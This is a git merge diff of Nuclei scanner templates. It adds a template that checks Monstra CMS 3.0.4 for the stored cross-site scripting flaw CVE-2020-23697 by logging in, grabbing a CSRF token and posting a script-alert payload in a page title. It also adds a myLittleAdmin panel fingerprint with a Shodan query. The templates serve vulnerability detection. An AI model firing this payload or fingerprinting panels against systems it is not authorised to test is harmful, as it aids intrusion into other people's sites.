Merge branch 'main' of https://github.com/projectdiscovery/nuclei-templates

.new-additions

@@ -3,6 +3,7 @@ cves/2010/CVE-2010-1429.yaml
 cves/2017/CVE-2017-11165.yaml
 cves/2018/CVE-2018-11227.yaml
 cves/2018/CVE-2018-11473.yaml
+cves/2020/CVE-2020-23697.yaml
 cves/2022/CVE-2022-0234.yaml
 cves/2022/CVE-2022-28117.yaml
 cves/2022/CVE-2022-29153.yaml
@@ -14,6 +15,7 @@ exposed-panels/freepbx-administration-panel.yaml
 exposed-panels/ldap-account-manager-panel.yaml
 exposed-panels/modoboa-panel.yaml
 exposed-panels/monstra-admin-panel.yaml
+exposed-panels/mylittleadmin-panel.yaml
 exposed-panels/saltgui-panel.yaml
 exposed-panels/sap-successfactors-detect.yaml
 exposed-panels/storybook-panel.yaml

cves/2020/CVE-2020-23697.yaml

@@ -0,0 +1,62 @@
+id: CVE-2020-23697
+
+info:
+  name: Monstra CMS V3.0.4 - Cross-Site Scripting
+  author: ritikchaddha
+  severity: medium
+  description: |
+    Cross Site Scripting vulnerabilty in Monstra CMS 3.0.4 via the 'page' feature in admin/index.php.
+  reference:
+    - https://github.com/monstra-cms/monstra/issues/463
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-23697
+  classification:
+    cve-id: CVE-2020-23697
+  metadata:
+    verified: true
+  tags: cve,cve2020,xss,mostra,mostracms,cms,authenticated
+
+variables:
+  string: "{{to_lower('{{randstr}}')}}"
+
+requests:
+  - raw:
+      - |
+        POST /admin/index.php?id=dashboard HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        login={{username}}&password={{password}}&login_submit=Log+In
+
+      - |
+        GET /admin/index.php?id=pages&action=add_page HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+      - |
+        POST /admin/index.php?id=pages&action=add_page HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        csrf={{csrf}}&page_title=%22%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_name={{string}}&page_meta_title=&page_keywords=&page_description=&pages=0&templates=index&status=published&access=public&editor=test&page_tags=&add_page_and_exit=Save+and+Exit&page_date=2023-01-09+18%3A22%3A15
+
+      - |
+        GET /{{string}} HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(all_headers_4, "text/html")'
+          - 'status_code_4 == 200'
+          - 'contains(body_4, "><script>alert(document.domain)</script>") && contains(body_4, "Monstra")'
+        condition: and
+
+    extractors:
+      - type: regex
+        name: csrf
+        part: body
+        group: 1
+        regex:
+          - 'id="csrf" name="csrf" value="(.*)">'
+        internal: true

exposed-panels/mylittleadmin-panel.yaml

@@ -0,0 +1,30 @@
+id: mylittleadmin-panel
+
+info:
+  name: myLittleAdmin Panel
+  author: nullfuzz
+  severity: info
+  description: |
+    myLittleAdmin  is a third-party tool that you can use to manipulate MS SQL databases.
+  reference:
+    - http://mylittleadmin.com/en/overview.aspx
+  metadata:
+    verified: true
+    shodan-query: http.html:"myLittleAdmin"
+  tags: panel,mylittleadmin,login
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/mylittleadmin/"
+
+    stop-at-first-match: true
+    host-redirects: true
+    max-redirects: 2
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains(body, '<title>myLittleAdmin for SQL Server')"
+        condition: and

exposures/backups/froxlor-database-backup.yaml

@@ -3,7 +3,7 @@ id: froxlor-database-backup
 info:
   name: Froxlor Database Backup File Disclosure
   author: tess
-  severity: low
+  severity: medium
   metadata:
     verified: true
     shodan-dork: title:"Froxlor Server Management Panel"